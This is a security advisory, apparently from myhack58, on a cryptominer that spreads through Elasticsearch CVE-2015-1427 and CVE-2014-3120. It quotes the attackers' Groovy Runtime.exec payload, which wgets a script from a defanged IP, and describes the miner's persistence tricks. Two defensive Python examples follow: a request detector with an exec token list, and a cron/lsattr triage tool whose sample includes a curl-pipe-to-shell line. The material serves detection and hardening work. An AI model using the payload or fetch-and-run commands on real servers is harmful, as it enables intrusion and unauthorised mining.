myhack58 / Anonymous / MYHACK58:62201892387
History: Dec 14, 2018 - 12:00 a.m.

Cryptocurrency miner propagating via Elasticsearch vulnerabilities - vulnerability warning - the black bar safety net

2018-12-14 00:00:00
Anonymous
www.myhack58.com

CVSS2: 7.5 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS: 0.867 High
Percentile: 98.3%

Elasticsearch is a search server built on Lucene. It provides a distributed, multi-tenant full-text search engine behind a RESTful web interface. Elasticsearch is written in Java and released as open source under the Apache license, and it is currently a popular enterprise search engine, designed to deliver real-time search while being stable, reliable, quick to install and easy to use.
Researchers detected mining activity on a honeypot system that included the Elasticsearch search engine. The mining attacks exploit the known vulnerabilities CVE-2015-1427 and CVE-2014-3120. CVE-2015-1427 is a vulnerability in the Groovy scripting engine that allows a remote attacker to execute arbitrary shell commands by constructing a script. CVE-2014-3120 is a vulnerability in Elasticsearch's default configuration. The vulnerable versions are no longer supported by Elasticsearch.
The researchers observed the following query command being run against the Elasticsearch server:
{"lupin":{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P /tmp/sssooo\").getText()"}}}
The attacking system and the attacked host both use the same command, and the command also saves the payload locally. The IP address resolves to the domain matrixhazel[.]com; as of this writing, the IP is no longer reachable.
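The query above is the kind of request a defender can catch at the HTTP layer: on the vulnerable 1.x releases an inline "script" value in a _search or _update body that reaches into java.lang.Runtime is never legitimate traffic. The following Python is an added example (not code from the article or from Elastic) that scans request bodies for those indicators and separately checks an elasticsearch.yml for the two settings Elastic documented as the mitigations of that era (script.disable_dynamic for CVE-2014-3120, script.groovy.sandbox.enabled for CVE-2015-1427). The sample requests and config texts are constructed; wrapping the observed script in a script_fields clause is an assumption, since the page shows only the inner fragment.

```python
import json
import re

# Tokens that mark a script reaching for OS command execution (constructed list).
SUSPICIOUS_TOKENS = (
    "java.lang.Math.class.forName",
    "java.lang.Runtime",
    ".getRuntime()",
    ".exec(",
    "ProcessBuilder",
)

# Endpoints that accepted inline scripts on the vulnerable 1.x branch.
SCRIPT_ENDPOINT = re.compile(r"/_search(\?|$)|/_update(\?|$)")


def _script_strings(obj):
    """Yield every string value stored under a 'script' key, at any depth."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            if key == "script" and isinstance(value, str):
                yield value
            else:
                yield from _script_strings(value)
    elif isinstance(obj, list):
        for item in obj:
            yield from _script_strings(item)


def inspect_request(method, path, body):
    """Return the indicators matched in one request body, in SUSPICIOUS_TOKENS order ([] if clean)."""
    if not SCRIPT_ENDPOINT.search(path):
        return []
    try:
        doc = json.loads(body)
    except json.JSONDecodeError:
        # Attack bodies are often malformed JSON; fall back to a raw substring scan.
        return [t for t in SUSPICIOUS_TOKENS if t in body]
    found = set()
    for script in _script_strings(doc):
        found.update(t for t in SUSPICIOUS_TOKENS if t in script)
    return [t for t in SUSPICIOUS_TOKENS if t in found]


def flagged_requests(requests):
    """Return (path, indicators) for every request in the iterable that matches."""
    out = []
    for method, path, body in requests:
        hits = inspect_request(method, path, body)
        if hits:
            out.append((path, hits))
    return out


# Script text as shown on the page (URL defanged there). The script_fields framing is an assumption.
OBSERVED_SCRIPT = (
    'java.lang.Math.class.forName("java.lang.Runtime").getRuntime()'
    '.exec("wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P /tmp/sssooo").getText()'
)

# Constructed sample traffic: one exploitation attempt and two benign requests.
SAMPLE_REQUESTS = [
    ("POST", "/_search?pretty", json.dumps({"size": 1, "script_fields": {"lupin": {"script": OBSERVED_SCRIPT}}})),
    ("POST", "/_search", json.dumps({"query": {"match": {"title": "elasticsearch"}}})),
    ("PUT", "/index/_doc/1", json.dumps({"title": "no scripts here"})),
]

# Settings that disabled dynamic and Groovy scripting on the 1.x branch.
HARDENED_SETTINGS = {
    "script.disable_dynamic": "true",
    "script.groovy.sandbox.enabled": "false",
}


def parse_simple_yaml(text):
    """Read flat 'key: value' lines (enough for elasticsearch.yml settings; comments ignored)."""
    settings = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if ":" in line:
            key, value = line.split(":", 1)
            settings[key.strip()] = value.strip().lower()
    return settings


def missing_hardening(config_text):
    """Return the hardening keys that are absent or still set to the weak value."""
    present = parse_simple_yaml(config_text)
    return [k for k, want in HARDENED_SETTINGS.items() if present.get(k) != want]


# Constructed config fragments for a hypothetical node: weak default beside the hardened form.
WEAK_CONFIG = "cluster.name: es-honeypot\nscript.disable_dynamic: false\n"
HARDENED_CONFIG = (
    "cluster.name: es-honeypot\n"
    "script.disable_dynamic: true\n"
    "script.groovy.sandbox.enabled: false\n"
)

if __name__ == "__main__":
    for path, hits in flagged_requests(SAMPLE_REQUESTS):
        print(f"ALERT {path}: {', '.join(hits)}")
    print("weak config missing:", missing_hardening(WEAK_CONFIG))
    print("hardened config missing:", missing_hardening(HARDENED_CONFIG))
```

The request check deliberately walks the parsed JSON rather than grepping the whole body, so a document that merely stores the string "exec(" in a field is not flagged; the raw-substring fallback only engages when the body is not valid JSON. Note that these settings apply to the 1.x line the article discusses; later releases replaced them with the script.inline and script.indexed controls.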
Figure 1. GreyNoise marks the host as a known scanner
The miner first invokes a shell and runs the download command to fetch the bash script update.sh; the output of the command is written to the file /tmp/sssooo. /tmp is used because on most systems it is subject to relatively few restrictions by default.
The attack is very simple, but the impact on the victim is significant. Once an attacker gains the ability to run arbitrary commands, they can attempt privilege escalation and even pivot to other systems to compromise the entire network.
Although the attack method is roughly the same, the payload may differ. In the sample the researchers analyzed, the payload was update.sh. When run, the update.sh script downloads two files, devtools and config.json, and then deploys the cryptocurrency miner.
The actual miner is the ELF64 binary devtools; the name helps disguise the miner, since devtools is a common tool name on GitHub. The miner reads its settings from the config.json file.
Figure 2. The config.json configuration file
This program has been widely used by malware before, but the wrapper script has many other interesting functions. Its code style is very similar to that of the hack tool, and part of the code also appears in malware associated with Xbash.

Cryptocurrency miner deployment
The miner consists of three files, which can be downloaded with the bash wget, curl or url commands:
Figure 3. The wget, curl and url commands
The miner downloads the following:
devtools - the actual miner
update.sh - the bash script used to download the other components
config.json - the miner's configuration file
First, the malware tries to save these files under /etc/; if that fails, it tries the /tmp directory. In the sample the researchers analyzed, the files were successfully stored in /tmp. It then checks whether other mining activity is already present on the machine, on the assumption that the device has already been compromised, and attempts to hijack the machine from the other attacker. The same process may be used to update the miner to a newer version.
Figure 4. The sample's command for removing other miners already present
If other miners are detected on the system, the processes associated with them are killed. The crontab is also reset so that cron will not start any other miner.
Figure 5. Killing other miner processes on the system
The miner then adds itself to the crontab, scheduled to run every 10 minutes. On each run it first uses chattr -i to unlock itself, updates its files, and finally uses chattr +i to protect the files from being modified or deleted by low-privilege users. The miner also clears the shell history to avoid being tracked, as shown in Figure 8. An interesting detail is that when the script runs as root, it tries to add its own SSH key to authorized_keys so that it can log in without a password. However, the command sequence is flawed, so the key that was just added to authorized_keys is removed again.
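The persistence traits described above (a crontab entry firing every 10 minutes, chattr +i on the dropped files, fixed file names under /etc or /tmp) are the ones a responder can hunt for on a suspect host. The Python below is an added example, not code from the article, that applies those checks to text a triage script would collect: the output of crontab -l and of lsattr. The cron and lsattr samples are constructed to mirror the behaviour the report describes, and the example.invalid hostname in them is a placeholder.

```python
import re

# File names named in the report and the two directories the dropper tries, in that order.
DROPPER_NAMES = ("devtools", "update.sh", "config.json", "sssooo")
DROPPER_DIRS = ("/etc", "/tmp")

# A fetch command whose output is piped straight into a shell.
FETCH_PIPE = re.compile(r"\b(wget|curl)\b.*\|\s*(ba)?sh\b")


def minute_interval(field):
    """Interval in minutes implied by a crontab minute field: '*' -> 1, '*/N' -> N, else None."""
    if field == "*":
        return 1
    match = re.fullmatch(r"\*/(\d+)", field)
    return int(match.group(1)) if match else None


def suspicious_cron_entries(crontab_text, max_minutes=10):
    """Return cron lines that fire at least every max_minutes and touch dropper paths,
    pipe a download into a shell, or toggle chattr."""
    hits = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)          # m h dom mon dow command
        if len(fields) < 6:
            continue
        interval = minute_interval(fields[0])
        if interval is None or interval > max_minutes:
            continue
        command = fields[5]
        touches_dropper = any(f"{d}/{n}" in command for d in DROPPER_DIRS for n in DROPPER_NAMES)
        if touches_dropper or FETCH_PIPE.search(command) or "chattr" in command:
            hits.append(line)
    return hits


def immutable_files(lsattr_output):
    """Paths carrying the immutable flag (lowercase 'i') in lsattr output lines such as
    '----i---------e---- /etc/devtools'."""
    found = []
    for line in lsattr_output.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and "i" in parts[0]:
            found.append(parts[1])
    return found


def dropper_paths(immutable):
    """Subset of immutable paths whose name matches one of the report's artifacts."""
    return [p for p in immutable if any(p == f"{d}/{n}" for d in DROPPER_DIRS for n in DROPPER_NAMES)]


def triage(crontab_text, lsattr_output):
    """Combine both checks into one findings dict for a host."""
    immutable = immutable_files(lsattr_output)
    return {
        "cron": suspicious_cron_entries(crontab_text),
        "immutable": immutable,
        "immutable_dropper_files": dropper_paths(immutable),
    }


# Constructed crontab -l output: one benign job, one job shaped like the report's persistence, one slow job.
SAMPLE_CRONTAB = """\
# m h dom mon dow command   (constructed sample)
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/10 * * * * chattr -i /etc/devtools; curl -s http://example.invalid/update.sh | sh; chattr +i /etc/devtools
*/30 * * * * /usr/local/bin/backup.sh
"""

# Constructed lsattr output for a few files under /etc.
SAMPLE_LSATTR = """\
--------------e---- /etc/hostname
----i---------e---- /etc/devtools
----i---------e---- /etc/config.json
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE_CRONTAB, SAMPLE_LSATTR).items():
        print(f"{key}: {value}")
```

On a real host the two inputs come from crontab -l for every account (the report says the crontab is reset and rewritten, so root's is the first to check) and from lsattr over /etc and /tmp; an immutable file in /tmp that a normal package would never mark that way is a strong signal on its own, and chattr -i is needed before the file can be removed.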
Figure 6. Other miner functions: component protection, crontab persistence, network traffic encryption
Figure 7. The miner modifies the system's iptables/firewall

